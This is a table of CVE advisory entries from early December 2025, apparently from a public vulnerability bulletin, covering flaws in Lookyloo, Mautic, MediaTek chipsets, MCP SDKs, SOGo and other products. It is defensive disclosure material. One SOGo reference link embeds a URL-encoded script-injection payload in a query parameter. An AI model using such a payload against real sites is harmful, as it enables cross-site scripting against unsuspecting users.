| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, Lookyloo passed improperly escaped values to cells rendered in datatables using the orthogonal-data feature. It is definitely exploitable from the popup view, but it is most probably also exploitable in many other places. This vulnerability is fixed in 1.35.3. | 2025-12-02 | not yet calculated | CVE-2025-66460 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-r93r-7jfr-99c3 https://github.com/Lookyloo/lookyloo/commit/63b39311f6b251a671895d97174345faf1b18e6e |
| Mautic--Mautic | Summary: Arbitrary files can be uploaded via the GrapesJS Builder, as the types of files that can be uploaded are not restricted. Impact: If the media folder is not restricted from executing files, this can lead to remote code execution. | 2025-12-02 | not yet calculated | CVE-2025-13827 | https://github.com/mautic/mautic/security/advisories/GHSA-5xw2-57jx-pgjp |
| Mautic--Mautic | Summary: A non-privileged user can install and remove arbitrary packages via Composer on a Composer-based installation, even if the "enable Composer-based update" flag in the update settings is unticked. Impact: A low-privileged user of the platform can install malicious code to obtain higher privileges. | 2025-12-02 | not yet calculated | CVE-2025-13828 | https://github.com/mautic/mautic/security/advisories/GHSA-3fq7-c5m8-g86x |
| mayurik--dawa-pharma | dawa-pharma-1.0 allows unauthenticated attackers to execute SQL queries on the server, allowing them to access sensitive information and potentially gain administrative access. | 2025-12-04 | not yet calculated | CVE-2023-53734 | ExploitDB-51818 Mayuri K Pharmacy Billing Software GitHub Repository for CVE-nu11secur1ty nu11secur1ty Home Page https://www.vulncheck.com/advisories/dawa-pharma-10-sql-injection-via-email-parameter |
| mborgerding/kissfft--mborgerding/kissfft | KissFFT versions prior to the fix commit 1b083165 contain an integer overflow in kiss_fft_alloc() in kiss_fft.c on platforms where size_t is 32-bit. The nfft parameter is not validated before being used in a size calculation (sizeof(kiss_fft_cpx) * (nfft - 1)), which can wrap to a small value when nfft is large. As a result, malloc() allocates an undersized buffer and the subsequent twiddle-factor initialization loop writes nfft elements, causing a heap buffer overflow. This vulnerability only affects 32-bit architectures. | 2025-12-01 | not yet calculated | CVE-2025-34297 | https://github.com/mborgerding/kissfft/commit/1b08316582049c3716154caefc0deab8758506e3 https://github.com/mborgerding/kissfft/issues/120 https://www.vulncheck.com/advisories/kissfft-integer-overflow-heap-buffer-overflow |
| MediaTek, Inc.--MT2718, MT2737, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6893, MT6895, MT6897, MT6899, MT6980D, MT6983, MT6985, MT6989, MT6990, MT6991, MT8113, MT8115, MT8139, MT8163, MT8168, MT8169, MT8183, MT8186, MT8188, MT8512, MT8516, MT8518, MT8519, MT8532, MT8676, MT8678, MT8695, MT8696, MT8698 | In aee daemon, there is a possible system crash due to a race condition. This could lead to local denial of service if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10190802; Issue ID: MSV-4833. | 2025-12-02 | not yet calculated | CVE-2025-20765 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4820. | 2025-12-02 | not yet calculated | CVE-2025-20766 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4807. | 2025-12-02 | not yet calculated | CVE-2025-20767 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4804. | 2025-12-02 | not yet calculated | CVE-2025-20769 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4803. | 2025-12-02 | not yet calculated | CVE-2025-20770 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible escalation of privilege due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4802. | 2025-12-02 | not yet calculated | CVE-2025-20771 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4801. | 2025-12-02 | not yet calculated | CVE-2025-20772 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4797. | 2025-12-02 | not yet calculated | CVE-2025-20773 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4796. | 2025-12-02 | not yet calculated | CVE-2025-20774 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to an incorrect bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01689251; Issue ID: MSV-4840. | 2025-12-02 | not yet calculated | CVE-2025-20754 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to an uncaught exception. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673755; Issue ID: MSV-4647. | 2025-12-02 | not yet calculated | CVE-2025-20758 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8676, MT8791T | In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01270690; Issue ID: MSV-4301. | 2025-12-02 | not yet calculated | CVE-2025-20752 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT8673, MT8675, MT8771, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8893 | In Modem, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673760; Issue ID: MSV-4650. | 2025-12-02 | not yet calculated | CVE-2025-20759 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to an uncaught exception. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01689252; Issue ID: MSV-4841. | 2025-12-02 | not yet calculated | CVE-2025-20753 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673749; Issue ID: MSV-4643. | 2025-12-02 | not yet calculated | CVE-2025-20756 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01661199; Issue ID: MSV-4296. | 2025-12-02 | not yet calculated | CVE-2025-20750 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01661195; Issue ID: MSV-4297. | 2025-12-02 | not yet calculated | CVE-2025-20751 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible application crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00628396; Issue ID: MSV-4775. | 2025-12-02 | not yet calculated | CVE-2025-20755 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673751; Issue ID: MSV-4644. | 2025-12-02 | not yet calculated | CVE-2025-20757 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01677581; Issue ID: MSV-4701. | 2025-12-02 | not yet calculated | CVE-2025-20790 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01661189; Issue ID: MSV-4298. | 2025-12-02 | not yet calculated | CVE-2025-20791 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8791T | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01717526; Issue ID: MSV-5591. | 2025-12-02 | not yet calculated | CVE-2025-20792 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991 | In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4805. | 2025-12-02 | not yet calculated | CVE-2025-20768 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182914; Issue ID: MSV-4795. | 2025-12-02 | not yet calculated | CVE-2025-20775 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184297; Issue ID: MSV-4759. | 2025-12-02 | not yet calculated | CVE-2025-20776 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184870; Issue ID: MSV-4752. | 2025-12-02 | not yet calculated | CVE-2025-20777 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793, MT8796, MT8873, MT8893 | In smi, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10259774; Issue ID: MSV-5029. | 2025-12-02 | not yet calculated | CVE-2025-20764 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6781, MT6833, MT6853, MT6877, MT6893, MT8196 | In GPU pdma, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS10117741; Issue ID: MSV-4538. | 2025-12-02 | not yet calculated | CVE-2025-20789 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793, MT8796, MT8873, MT8893 | In mmdvfs, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10267218; Issue ID: MSV-5032. | 2025-12-02 | not yet calculated | CVE-2025-20763 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6991, MT8196 | In GPU pdma, there is a possible memory corruption due to a missing permission check. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS10117735; Issue ID: MSV-4539. | 2025-12-02 | not yet calculated | CVE-2025-20788 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| mersive--Solstice Pod API Session Key Extraction via API Endpoint | Solstice Pod API (version 5.5, 6.2) contains an unauthenticated API endpoint (`/api/config`) that exposes sensitive information such as the session key, server version, product details, and display name. Unauthorized users can extract live session information by accessing this endpoint without authentication. | 2025-12-04 | not yet calculated | CVE-2025-66573 | ExploitDB-52104 Mersive Homepage Solstice Documentation https://www.vulncheck.com/advisories/solstice-pod-api-session-key-extraction-via-api-endpoint |
| modelcontextprotocol--python-sdk | The MCP Python SDK, called `mcp` on PyPI, is a Python implementation of the Model Context Protocol (MCP). Prior to version 1.23.0, the Model Context Protocol (MCP) Python SDK does not enable DNS rebinding protection by default for HTTP-based servers. When an HTTP-based MCP server is run on localhost without authentication using FastMCP with streamable HTTP or SSE transport, and has not configured TransportSecuritySettings, a malicious website could exploit DNS rebinding to bypass same-origin policy restrictions and send requests to the local MCP server. This could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the user in those limited circumstances. Note that running HTTP-based MCP servers locally without authentication is not recommended per MCP security best practices. This issue does not affect servers using stdio transport. This vulnerability is fixed in 1.23.0. | 2025-12-02 | not yet calculated | CVE-2025-66416 | https://github.com/modelcontextprotocol/python-sdk/security/advisories/GHSA-9h52-p55h-vw2f https://github.com/modelcontextprotocol/python-sdk/commit/d3a184119e4479ea6a63590bc41f01dc06e3fa99 |
| modelcontextprotocol--typescript-sdk | MCP TypeScript SDK is the official TypeScript SDK for Model Context Protocol servers and clients. Prior to 1.24.0, the Model Context Protocol (MCP) TypeScript SDK does not enable DNS rebinding protection by default for HTTP-based servers. When an HTTP-based MCP server is run on localhost without authentication with StreamableHTTPServerTransport or SSEServerTransport and has not enabled enableDnsRebindingProtection, a malicious website could exploit DNS rebinding to bypass same-origin policy restrictions and send requests to the local MCP server. This could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the user in those limited circumstances. Note that running HTTP-based MCP servers locally without authentication is not recommended per MCP security best practices. This issue does not affect servers using stdio transport. This vulnerability is fixed in 1.24.0. | 2025-12-02 | not yet calculated | CVE-2025-66414 | https://github.com/modelcontextprotocol/typescript-sdk/security/advisories/GHSA-w48q-cv73-mx4w https://github.com/modelcontextprotocol/typescript-sdk/commit/09623e2aa5044f9e9da62c73d820a8250b9d97ed |
| monkeytypegame--monkeytype | Monkeytype is a minimalistic and customizable typing test. In 25.49.0 and earlier, there is improper handling of user input which allows an attacker to execute malicious javascript on anyone viewing a malicious quote submission. quote.text and quote.source are user input, and they're inserted straight into the DOM. If they contain HTML tags, they will be rendered (after some escaping using quotes and textarea tags). | 2025-12-04 | not yet calculated | CVE-2025-66563 | https://github.com/monkeytypegame/monkeytype/security/advisories/GHSA-mfjh-9552-8g27 https://github.com/monkeytypegame/monkeytype/commit/d6d062a77132ba7d6ba3b482d46ae329d3b8d695 |
| mozilla--rhino | Rhino is an open-source implementation of JavaScript written entirely in Java. Prior to 1.8.1, 1.7.15.1, and 1.7.14.1, when an application passed an attacker-controlled floating point number into the toFixed() function, it might lead to high CPU consumption and a potential Denial of Service. Small numbers go through this call stack: NativeNumber.numTo > DToA.JS_dtostr > DToA.JS_dtoa > DToA.pow5mult where pow5mult attempts to raise 5 to a ridiculous power. This vulnerability is fixed in 1.8.1, 1.7.15.1, and 1.7.14.1. | 2025-12-03 | not yet calculated | CVE-2025-66453 | https://github.com/mozilla/rhino/security/advisories/GHSA-3w8q-xq97-5j7x |
| n/a-- Aquarius HelperTool (1.0.003) privileged XPC service on macOS | The Aquarius HelperTool (1.0.003) privileged XPC service on macOS contains multiple flaws that allow local privilege escalation. The service accepts XPC connections from any local process without validating the client's identity, and its authorization logic incorrectly calls AuthorizationCopyRights with a NULL reference, causing all authorization checks to succeed. The executeCommand:authorization:withReply: method then interpolates attacker-controlled input into NSTask and executes it with root privileges. A local attacker can exploit these weaknesses to run arbitrary commands as root, create persistent backdoors, or obtain a fully interactive root shell. | 2025-12-03 | not yet calculated | CVE-2025-65842 | https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/ |
| n/a--Abacre Restaurant Point of Sale (POS) up to 15.0.0.1656 | Abacre Restaurant Point of Sale (POS) up to 15.0.0.1656 is vulnerable to Cleartext Storage of Sensitive Information in Memory. The application leaves valid device-bound license keys in process memory during an activation attempt. | 2025-12-03 | not yet calculated | CVE-2025-65320 | https://github.com/Smarttfoxx/CVE-2025-- https://packetstorm.news/files/id/212149 |
| n/a--Akamai Ghost on Akamai CDN edge servers before 2025-11-17 | Akamai Ghost on Akamai CDN edge servers before 2025-11-17 has a chunked request body processing error that can result in HTTP request smuggling. When Akamai Ghost receives an invalid chunked body that includes a chunk size different from the actual size of the following chunk data, under certain circumstances, Akamai Ghost erroneously forwards the invalid request and subsequent superfluous bytes to the origin server. An attacker could hide a smuggled request in these superfluous bytes. Whether this is exploitable depends on the origin server's behavior and how it processes the invalid request it receives from Akamai Ghost. | 2025-12-04 | not yet calculated | CVE-2025-66373 | https://en.wikipedia.org/wiki/HTTP_request_smuggling https://www.akamai.com/blog/security/cve-2025-66373-http-request-smuggling-chunked-body-size |
| n/a--alexusmai laravel-file-manager 3.3.1 | alexusmai laravel-file-manager 3.3.1 and below is vulnerable to Directory Traversal. The zip/archiving functionality allows an attacker to create archives containing files and directories outside the intended scope due to improper path validation. | 2025-12-03 | not yet calculated | CVE-2025-65345 | https://github.com/alexusmai/laravel-file-manager https://github.com/tlekrean/CVE-2025-65345 |
| n/a--alexusmai laravel-file-manager 3.3.1 | alexusmai laravel-file-manager 3.3.1 and below is vulnerable to Directory Traversal. The unzip/extraction functionality improperly allows archive contents to be written to arbitrary locations on the filesystem due to insufficient validation of extraction paths. | 2025-12-04 | not yet calculated | CVE-2025-65346 | https://github.com/alexusmai/laravel-file-manager https://github.com/Theethat-Thamwasin/CVE-2025-65346 |
| n/a--Alinto Sogo 5.12.3 | Alinto Sogo 5.12.3 is vulnerable to Cross Site Scripting (XSS) via the theme parameter. | 2025-12-04 | not yet calculated | CVE-2025-63499 | https://github.com/poblaguev-tot/CVE-2025-63499 https://email.example.com/SOGo/so/victim@example.com/Mail/view?theme=%27%3CScRiPt%20%3Ealert%289998%29%3C%2FScRiPt%3E |
| n/a--ALL-RUT22GW v3.3.8 | ALLNET ALL-RUT22GW v3.3.8 was discovered to store hardcoded credentials in the libicos.so library. | 2025-12-04 | not yet calculated | CVE-2025-29268 | http://all-rut22gw.com http://allnet.com https://blog.byteray.co.uk/critical-vulnerabilities-in-rut22gw-industrial-lte-cellular-routers-f4eb8768feb7?gi=f74ff4eb9f22 |
| n/a--ALL-RUT22GW v3.3.8 | ALLNET ALL-RUT22GW v3.3.8 was discovered to contain an OS command injection vulnerability via the command parameter in the popen.cgi endpoint. | 2025-12-04 | not yet calculated | CVE-2025-29269 | http://all-rut22gw.com http://allnet.com https://blog.byteray.co.uk/critical-vulnerabilities-in-rut22gw-industrial-lte-cellular-routers-f4eb8768feb7?gi=f74ff4eb9f22 |
| n/a--ApiPayController.java of platform v1.0.0 | Incorrect access control in the component ApiPayController.java of platform v1.0.0 allows attackers to access sensitive information via unspecified vectors. | 2025-12-04 | not yet calculated | CVE-2025-57210 | https://gitee.com/fuyang_lipengjun/platform https://gist.github.com/xueye0629/4411663241fa3bbba628d3044dc50451 |
